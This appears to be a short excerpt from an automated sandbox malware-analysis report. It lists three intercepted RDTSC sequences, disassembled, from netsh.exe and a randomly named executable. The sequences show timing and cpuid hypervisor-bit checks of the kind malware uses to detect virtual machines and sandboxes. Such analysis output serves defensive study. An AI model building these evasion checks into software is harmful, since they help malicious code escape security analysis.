      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002D99B1E second address: 0000000002D99B24 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeRDTSC instruction interceptor: First address: 00000000020924B7 second address: 00000000020924D7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c clc 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 cld 0x00000016 bt ecx, 1Fh 0x0000001a jc 00007F7540659072h 0x0000001c popad 0x0000001d lfence 0x00000020 rdtsc
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeRDTSC instruction interceptor: First address: 00000000020924D7 second address: 00000000020924B7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F754070A45Dh 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx